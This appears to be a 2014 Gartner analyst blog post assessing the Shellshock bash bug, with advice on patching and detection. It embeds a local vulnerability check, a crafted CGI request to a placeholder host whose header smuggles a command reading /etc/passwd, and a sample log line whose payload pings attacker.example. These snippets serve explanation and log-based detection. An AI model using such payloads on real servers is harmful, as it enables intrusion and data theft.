Sometimes you have a gut feeling. And sometimes you should trust that feeling. I personally believe that this Shellshock bug is far more serious than Heartbleed, and I say that for a number of reasons. When I first looked at the CVE database entry (CVE-2014-6271), I saw that NIST had assigned it a score of 10 out of 10 – pretty much as serious as it can get – but disclosed only sparse information, mentioning some possible attack vectors such as the OpenSSH sshd and mod_cgi, plus some mention of “unspecified DHCP clients” that is not quite understandable to me. Do I need to read this as: “Caution – although we mention mod_cgi, which is present on half of the Unix systems installed on this planet, possible attack vectors could even include the DHCP daemon and a whole lot of stuff that we do not know (yet)”? Well, this is a known unknown to me. And whenever I do not have enough information to make a fully qualified judgment, that makes me suspicious and calls for some serious action.
OK, down to the facts. What are the known knowns? My colleague Erik Heidt did a deep dive and fiddled around with the bug in his lab. Erik found a few important points to consider (until we know more, these are all preliminary, by the way):
1. The Shellshock bug allows for command “injection” but does not appear to permit privilege escalation.
2. It looks as if it is possible to build an automated exploit that scans for vulnerable systems and uses the bug to gain remote access. It is, however, unclear why some sources say that the bug would be “wormable”. “Worm” implies that the remote access is used to turn the target into an attack platform in an automated process. That I doubt.
3. Shellshock’d commands show up in the account history – so unlike Heartbleed, there will be clues regarding exploitation. Sure, you can erase the history – but my point is that if the attacker’s actions run as ordinary user events, those events can be reconstructed. (And then there are those core dumps…)
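The injection mechanics behind point 1 are easy to demonstrate locally. A minimal sketch of the canonical CVE-2014-6271 test (harmless to run – it only tries to echo a marker string via an exported function definition with a trailing command):

```shell
#!/bin/sh
# Canonical Shellshock check: a vulnerable bash executes the command
# that trails the exported function body ("echo injected") while
# importing the environment; a patched bash ignores it.
if env x='() { :;}; echo injected' bash -c ':' 2>/dev/null | grep -q injected; then
    echo "VULNERABLE"
else
    echo "patched"
fi
```

On any system patched after the disclosure, this should print “patched”; on an unpatched bash it prints “VULNERABLE” – which is exactly the command injection Erik observed in the lab.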
Permitting remote execution of commands from a web interface is a dangerous business, and it is unlikely that such systems are ‘secure’ – in the sense that there are so many vulnerabilities to address once you permit remote command execution that this bug is just the cherry on top of the attack sundae.
The reason I am not too worried about this from the “worm” perspective is that this is an amateurish way to build an application, and as a result each of these ‘exploits’ is going to require an exploration phase in which the attacker figures out what access and capabilities the remote account has.
For web applications specifically, the bug is unlikely to be exposed in important applications (i.e. online banking, commercial solutions, etc.) but much more likely in the forgotten-about one-off fix – the code that was ‘fast-tracked’ to address an ‘urgent client or sales need’ and then forgotten about. That is where folks are going to get hammered with this. But I would argue that if they were coding a web application this way, they asked for it. Again, code written like this – making direct OS calls with no input validation in a mono-tier application – is begging to be exploited.
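To make the mod_cgi vector concrete: CGI copies request headers into environment variables (User-Agent becomes HTTP_USER_AGENT), which is exactly where a vulnerable bash picks up the exported-function payload. A sketch of the raw request an automated scanner might send – the host and CGI path here are placeholders, not real endpoints, and the request is only printed, not sent:

```shell
#!/bin/sh
# Illustrative only: target.example.com and /cgi-bin/status.sh are
# hypothetical. The User-Agent value starts with the bash
# function-export marker "() {"; on an unpatched server, bash would
# treat it as a function definition and run the trailing command.
PAYLOAD='() { :;}; /bin/cat /etc/passwd'
printf 'GET /cgi-bin/status.sh HTTP/1.1\r\nHost: target.example.com\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n' "$PAYLOAD"
```

Note that the payload runs with the privileges of the web server account – consistent with point 1 above, it is injection, not privilege escalation.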
What else do we observe? AWS has scheduled a massive maintenance reboot that, by coincidence, comes around the same time as the Shellshock bug. Did someone maybe find a way to shock a hypervisor? Until 1 OCT this information is embargoed; later this year we will all know.
Given that we do not currently have enough information at hand to make a qualified judgment, you should probably assume that attack vectors can potentially reach down to the DHCP daemon, and could also involve, for example, routing daemons and VPN software. But what should you do?
Patching and hardening remain essential for all servers. Patch management is the single most appropriate safeguard for any category of server. The majority of safeguards are compensating controls that prevent the exploitation of software deficiencies which can ultimately only be resolved through patching. Right. But what if, as some sources state, the patch only helps partially? Well, then you at least have a partial mitigation of your headache, and you join the next round (of patching) when it becomes available. Best-in-class companies have started to patch their systems, and so should you! In my opinion, this would now be the big hour of the endpoint security and Network Intrusion Prevention System (NIPS) vendors that provide “virtual patching” capabilities. “Virtual patches” are enforced via endpoint agent software or NIPS appliances and, if vendors are to be believed, protect your systems from an attack even if no patch has been released yet or if the nature of the system prohibits patching. So far, however, they have all stayed silent. Guys, your historical hour (at least of the last decade) is now! Where are your virtual patches?!
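Until those virtual patches arrive, there is at least a crude detection stopgap defenders can run today: since exploitation attempts via HTTP carry the function-export marker “() {” in a header, you can grep your web server logs for it. A minimal sketch – the log path and sample entries below are illustrative assumptions, not real traffic:

```shell
#!/bin/sh
# Stopgap detection sketch: look for the Shellshock marker "() {" in
# web server access logs. We fabricate a tiny sample log here so the
# example is self-contained; point LOG at your real access log.
LOG=/tmp/sample_access.log
cat > "$LOG" <<'EOF'
1.2.3.4 - - [25/Sep/2014:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; /bin/ping -c1 attacker.example"
5.6.7.8 - - [25/Sep/2014:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
# -F: fixed-string match, so "() {" is not treated as a regex.
grep -F '() {' "$LOG"
```

Only the first (malicious) line matches – which also reinforces point 3 above: unlike Heartbleed, Shellshock attempts tend to leave traces.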
Comments or opinions expressed on this blog are those of the individual contributors only, and do not necessarily represent the views of Gartner, Inc. or its management. Readers may copy and redistribute blog postings on other blogs, or otherwise for private, non-commercial or journalistic purposes, with attribution to Gartner. This content may not be used for any other purposes in any other formats or media. The content on this blog is provided on an "as-is" basis. Gartner shall not be liable for any damages whatsoever arising out of the content or use of this blog.